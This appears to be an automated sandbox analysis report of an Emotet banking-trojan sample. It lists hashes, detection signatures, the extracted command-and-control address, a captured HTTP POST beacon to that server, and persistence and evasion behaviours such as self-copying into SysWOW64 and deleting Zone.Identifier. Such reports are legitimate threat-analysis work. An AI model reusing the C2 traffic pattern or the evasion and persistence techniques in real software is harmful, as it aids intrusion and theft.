Loading ...

Play interactive tourEdit tour

Analysis Report 7ZYwCQ5sAy

Overview

General Information

Sample Name:7ZYwCQ5sAy (renamed file extension from none to exe)
MD5:a842af0d929ae1f564bf3c0fbfe80d86
SHA1:a61d1b63d47208729816dd3a5bb4704c261015b9
SHA256:23452214dba9a7be2b4b9c04f4ce5ccab222519f0d985961539f1ec4547b84bc

Most interesting Screenshot:

Detection

Emotet
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Contains functionality locales information (e.g. system language)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to upload files via FTP
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • 7ZYwCQ5sAy.exe (PID: 3636 cmdline: 'C:\Users\user\Desktop\7ZYwCQ5sAy.exe' MD5: A842AF0D929AE1F564BF3C0FBFE80D86)
    • KBDURDU.exe (PID: 2448 cmdline: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe MD5: A842AF0D929AE1F564BF3C0FBFE80D86)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["190.63.7.166/m5tYf9STTRkjXz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1065940307.00000000022D0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000001.00000002.1471371090.0000000002190000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: KBDURDU.exe.2448.1.memstrMalware Configuration Extractor: Emotet {"C2 list": ["190.63.7.166/m5tYf9STTRkjXz"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: 7ZYwCQ5sAy.exeVirustotal: Detection: 61%Perma Link
      Source: 7ZYwCQ5sAy.exeReversingLabs: Detection: 74%

      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_021A20D0 CryptDecodeObjectEx,1_2_021A20D0
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_021A20E8 CryptDecodeObjectEx,1_2_021A20E8

      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00448808 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_00448808
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00448ECB lstrlenA,FindFirstFileA,FindClose,0_2_00448ECB
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004692FB __EH_prolog,lstrlenA,lstrcpynA,FtpFindFirstFileA,0_2_004692FB
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00409909 lstrcpyA,FindFirstFileA,GetLastError,SetLastError,lstrlenA,SetLastError,0_2_00409909
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00467F40 GopherFindFirstFileA,0_2_00467F40
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00467FDE GopherFindFirstFileA,0_2_00467FDE
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022E3030 FindNextFileW,FindFirstFileW,FindClose,0_2_022E3030
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00448808 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,1_2_00448808
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00448ECB lstrlenA,FindFirstFileA,FindClose,1_2_00448ECB
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_004692FB __EH_prolog,lstrlenA,lstrcpynA,FtpFindFirstFileA,1_2_004692FB
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00409909 lstrcpyA,FindFirstFileA,GetLastError,SetLastError,lstrlenA,SetLastError,1_2_00409909
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00467F40 GopherFindFirstFileA,1_2_00467F40
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00467FDE GopherFindFirstFileA,1_2_00467FDE

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.6:49942 -> 190.63.7.166:8080
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004678AF FtpPutFileA,0_2_004678AF
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_004678AF FtpPutFileA,1_2_004678AF
      Source: global trafficTCP traffic: 192.168.2.6:49942 -> 190.63.7.166:8080
      Source: Joe Sandbox ViewASN Name: unknown unknown
      Source: global trafficHTTP traffic detected: POST /m5tYf9STTRkjXz/XPuDEs/SKGs/ HTTP/1.1Referer: http://190.63.7.166/m5tYf9STTRkjXz/XPuDEs/SKGs/Content-Type: multipart/form-data; boundary=---------------------------223834914667424User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.63.7.166:8080Content-Length: 4660Connection: Keep-AliveCache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 190.63.7.166
      Source: unknownTCP traffic detected without corresponding DNS query: 190.63.7.166
      Source: unknownTCP traffic detected without corresponding DNS query: 190.63.7.166
      Source: unknownTCP traffic detected without corresponding DNS query: 190.63.7.166
      Source: unknownTCP traffic detected without corresponding DNS query: 190.63.7.166
      Source: unknownTCP traffic detected without corresponding DNS query: 190.63.7.166
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004682AB InternetReadFile,InternetReadFile,InternetReadFile,InternetWriteFile,InternetWriteFile,InternetWriteFile,InternetWriteFile,lstrlenA,0_2_004682AB
      Source: unknownHTTP traffic detected: POST /m5tYf9STTRkjXz/XPuDEs/SKGs/ HTTP/1.1Referer: http://190.63.7.166/m5tYf9STTRkjXz/XPuDEs/SKGs/Content-Type: multipart/form-data; boundary=---------------------------223834914667424User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 190.63.7.166:8080Content-Length: 4660Connection: Keep-AliveCache-Control: no-cache
      Source: KBDURDU.exe, 00000001.00000002.1469829093.0000000000199000.00000004.00000001.sdmpString found in binary or memory: http://190.63.7.166/m5tYf9STTRkjXz/XPuDEs/SKGs/
      Source: 7ZYwCQ5sAy.exeString found in binary or memory: http://www.codeproject.com/internet/webgrab.asp
      Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1066064106.00000000023B0000.00000004.00000040.sdmpString found in binary or memory: http://www.codeproject.com/internet/webgrab.aspYl

      Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1065628832.00000000006EA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0043A48C __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,0_2_0043A48C
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0045A8A0 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,0_2_0045A8A0
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00464AB8 GetKeyState,GetKeyState,GetKeyState,0_2_00464AB8
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00445275 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00445275
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00441904 GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_00441904
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00461DCE GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,0_2_00461DCE
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00464AB8 GetKeyState,GetKeyState,GetKeyState,1_2_00464AB8
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00445275 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_00445275
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00441904 GetKeyState,GetKeyState,GetKeyState,GetKeyState,1_2_00441904
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00461DCE GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,1_2_00461DCE
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_0043A48C __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,1_2_0043A48C
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_0045A8A0 ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,1_2_0045A8A0

      E-Banking Fraud:

      barindex
      Yara detected EmotetShow sources
      Source: Yara matchFile source: 00000000.00000002.1065940307.00000000022D0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.1471371090.0000000002190000.00000040.00000001.sdmp, type: MEMORY

      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeFile created: C:\Windows\SysWOW64\KBDURDU\Jump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeFile deleted: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe:Zone.IdentifierJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004243770_2_00424377
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004165E40_2_004165E4
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004126780_2_00412678
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004468E90_2_004468E9
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0041B3EC0_2_0041B3EC
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022D521F0_2_022D521F
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022E58E00_2_022E58E0
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_004243771_2_00424377
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_004165E41_2_004165E4
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_004126781_2_00412678
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_004468E91_2_004468E9
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_0041B3EC1_2_0041B3EC
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_0219521F1_2_0219521F
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_021A58E01_2_021A58E0
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: String function: 00417C7C appears 370 times
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: String function: 00444BFF appears 33 times
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: String function: 0041ACA1 appears 32 times
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: String function: 0046D901 appears 49 times
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: String function: 004011F9 appears 35 times
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: String function: 0041CCA7 appears 41 times
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: String function: 0043FF19 appears 43 times
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: String function: 004181E8 appears 80 times
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: String function: 00417C7C appears 370 times
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: String function: 00444BFF appears 33 times
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: String function: 0041ACA1 appears 32 times
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: String function: 0046D901 appears 49 times
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: String function: 0041CCA7 appears 41 times
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: String function: 0043FF19 appears 43 times
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: String function: 004181E8 appears 79 times
      Source: 7ZYwCQ5sAy.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1068092313.0000000002EA0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 7ZYwCQ5sAy.exe
      Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1068092313.0000000002EA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 7ZYwCQ5sAy.exe
      Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1065015833.00000000004B5000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWebGrabber.EXEN vs 7ZYwCQ5sAy.exe
      Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1067804110.0000000002DA0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 7ZYwCQ5sAy.exe
      Source: 7ZYwCQ5sAy.exe, 00000000.00000002.1065902764.0000000002280000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs 7ZYwCQ5sAy.exe
      Source: 7ZYwCQ5sAy.exeBinary or memory string: OriginalFilenameWebGrabber.EXEN vs 7ZYwCQ5sAy.exe
      Source: classification engineClassification label: mal80.troj.evad.winEXE@3/0@0/1
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00467BEA LoadLibraryA,FormatMessageA,FormatMessageA,FormatMessageA,LocalFree,InternetGetLastResponseInfoA,InternetGetLastResponseInfoA,GetLastError,LocalAlloc,InternetGetLastResponseInfoA,lstrcpynA,LocalFree,lstrcpynA,LocalFree,FreeLibrary,0_2_00467BEA
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00452AF8 __EH_prolog,GetDiskFreeSpaceA,GetFullPathNameA,GetTempFileNameA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA,0_2_00452AF8
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_021A4170 Process32NextW,CreateToolhelp32Snapshot,FindCloseChangeNotification,1_2_021A4170
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0047CC20 CoCreateInstance,CoCreateInstance,CoCreateInstance,OleRun,0_2_0047CC20
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00406030 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceA,LoadResource,SizeofResource,VirtualAllocExNuma,0_2_00406030
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeMutant created: \Sessions\1\BaseNamedObjects\Global\I96565711
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeMutant created: \Sessions\1\BaseNamedObjects\Global\M96565711
      Source: 7ZYwCQ5sAy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 7ZYwCQ5sAy.exeVirustotal: Detection: 61%
      Source: 7ZYwCQ5sAy.exeReversingLabs: Detection: 74%
      Source: unknownProcess created: C:\Users\user\Desktop\7ZYwCQ5sAy.exe 'C:\Users\user\Desktop\7ZYwCQ5sAy.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeProcess created: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior

      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00443D7D GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_00443D7D
      Source: 7ZYwCQ5sAy.exeStatic PE information: section name: .didat
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00418223 push ecx; ret 0_2_00418233
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004166F0 push eax; ret 0_2_00416704
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004166F0 push eax; ret 0_2_0041672C
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00417C7C push eax; ret 0_2_00417C9A
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022D9472 push eax; retf 0_2_022D95A9
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022D9441 push eax; ret 0_2_022D946D
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022D94C6 push eax; retf 0_2_022D95A9
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022D9556 push eax; retf 0_2_022D95A9
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00418223 push ecx; ret 1_2_00418233
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_004166F0 push eax; ret 1_2_00416704
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_004166F0 push eax; ret 1_2_0041672C
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00417C7C push eax; ret 1_2_00417C9A
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_02199441 push eax; ret 1_2_0219946D
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_02199472 push eax; retf 1_2_021995A9
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_021994C6 push eax; retf 1_2_021995A9
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_02199556 push eax; retf 1_2_021995A9

      Persistence and Installation Behavior:

      barindex
      Drops executables to the windows directory (C:\Windows) and starts themShow sources
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeExecutable created and started: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exePE file moved: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeJump to behavior

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeFile opened: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004084FA IsIconic,GetWindowPlacement,GetWindowRect,0_2_004084FA
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0040141A IsIconic,0_2_0040141A
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004013A7 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_004013A7
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004576A9 __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,0_2_004576A9
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00461E71 IsWindowVisible,IsIconic,0_2_00461E71
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00451EF8 GetParent,GetParent,IsIconic,GetParent,0_2_00451EF8
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_004084FA IsIconic,GetWindowPlacement,GetWindowRect,1_2_004084FA
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_0040141A IsIconic,1_2_0040141A
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_004013A7 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,1_2_004013A7
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00461E71 IsWindowVisible,IsIconic,1_2_00461E71
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00451EF8 GetParent,GetParent,IsIconic,GetParent,1_2_00451EF8
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_004576A9 __EH_prolog,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,1_2_004576A9
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeAPI coverage: 2.8 %
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeAPI coverage: 2.7 %
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00448808 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_00448808
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00448ECB lstrlenA,FindFirstFileA,FindClose,0_2_00448ECB
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_004692FB __EH_prolog,lstrlenA,lstrcpynA,FtpFindFirstFileA,0_2_004692FB
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00409909 lstrcpyA,FindFirstFileA,GetLastError,SetLastError,lstrlenA,SetLastError,0_2_00409909
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00467F40 GopherFindFirstFileA,0_2_00467F40
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00467FDE GopherFindFirstFileA,0_2_00467FDE
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022E3030 FindNextFileW,FindFirstFileW,FindClose,0_2_022E3030
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00448808 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,1_2_00448808
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00448ECB lstrlenA,FindFirstFileA,FindClose,1_2_00448ECB
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_004692FB __EH_prolog,lstrlenA,lstrcpynA,FtpFindFirstFileA,1_2_004692FB
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00409909 lstrcpyA,FindFirstFileA,GetLastError,SetLastError,lstrlenA,SetLastError,1_2_00409909
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00467F40 GopherFindFirstFileA,1_2_00467F40
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_00467FDE GopherFindFirstFileA,1_2_00467FDE
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0041640F VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_0041640F
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeProcess information queried: ProcessInformationJump to behavior

      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_00443D7D GetModuleHandleA,LoadLibraryA,GetProcAddress,#17,#17,FreeLibrary,0_2_00443D7D
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022D0467 mov eax, dword ptr fs:[00000030h]0_2_022D0467
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022D2E6F mov eax, dword ptr fs:[00000030h]0_2_022D2E6F
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022D3BDF mov eax, dword ptr fs:[00000030h]0_2_022D3BDF
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022E42A0 mov eax, dword ptr fs:[00000030h]0_2_022E42A0
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_022E3530 mov eax, dword ptr fs:[00000030h]0_2_022E3530
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_02190467 mov eax, dword ptr fs:[00000030h]1_2_02190467
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_02192E6F mov eax, dword ptr fs:[00000030h]1_2_02192E6F
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_02193BDF mov eax, dword ptr fs:[00000030h]1_2_02193BDF
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_021A42A0 mov eax, dword ptr fs:[00000030h]1_2_021A42A0
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_021A3530 mov eax, dword ptr fs:[00000030h]1_2_021A3530
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0041EDE6 SetUnhandledExceptionFilter,0_2_0041EDE6
      Source: C:\Users\user\Desktop\7ZYwCQ5sAy.exeCode function: 0_2_0041EDFA SetUnhandledExceptionFilter,0_2_0041EDFA
      Source: C:\Windows\SysWOW64\KBDURDU\KBDURDU.exeCode function: 1_2_0041EDE6 SetUnhandledExceptionFilter,1_2_0041EDE6
